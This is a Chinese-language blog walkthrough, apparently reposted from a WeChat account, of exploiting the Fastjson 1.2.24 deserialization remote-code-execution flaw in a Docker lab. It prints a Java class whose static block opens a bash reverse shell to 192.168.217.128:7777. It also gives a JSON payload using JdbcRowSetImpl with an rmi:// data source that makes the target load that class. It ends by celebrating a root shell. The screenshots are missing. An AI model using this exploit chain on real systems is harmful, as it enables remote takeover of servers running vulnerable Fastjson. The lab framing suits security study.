Fastjson-1.2.24-rce

admin
admin
admin
140350
文章
117
评论
2023年12月28日09:55:27评论38 views字数 807阅读2分41秒阅读模式

一、环境搭建

机器:kali Linux

Java:jdk8

python:python3.7.x

二、搭建靶机环境

在docker里面搭建一个靶机环境

Fastjson-1.2.24-rce

看看能不能访问

Fastjson-1.2.24-rce

三、构建payload

将下列代码放进backshell.java

import java.lang.Runtime;
import java.lang.Process;

public class backshell {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.217.128/7777 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

用javac进行编译

Fastjson-1.2.24-rce

查看编译是否成功

Fastjson-1.2.24-rce

放进kali里面查看

Fastjson-1.2.24-rce
Fastjson-1.2.24-rce

四、用python搭建恶意站点

Fastjson-1.2.24-rce

五、用插件开启rmi监听

Fastjson-1.2.24-rce

六、用nc开启监听

Fastjson-1.2.24-rce

七、用BP抓包

用BP抓包,然后修改POST传参方法,放到重放器模块,写入恶意类

{    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://192.168.217.128:9999/backshell",        "autoCommit":true    } }

修改数据类型为json,点击发送

Fastjson-1.2.24-rce

八、查看监听的shell

Fastjson-1.2.24-rce

发现反弹shell成功,命令符在手,还是root权限,一切你说了算!

原文始发于微信公众号(黄公子学安全):Fastjson-1.2.24-rce

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月28日09:55:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Fastjson-1.2.24-rcehttps://cn-sec.com/archives/2342324.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息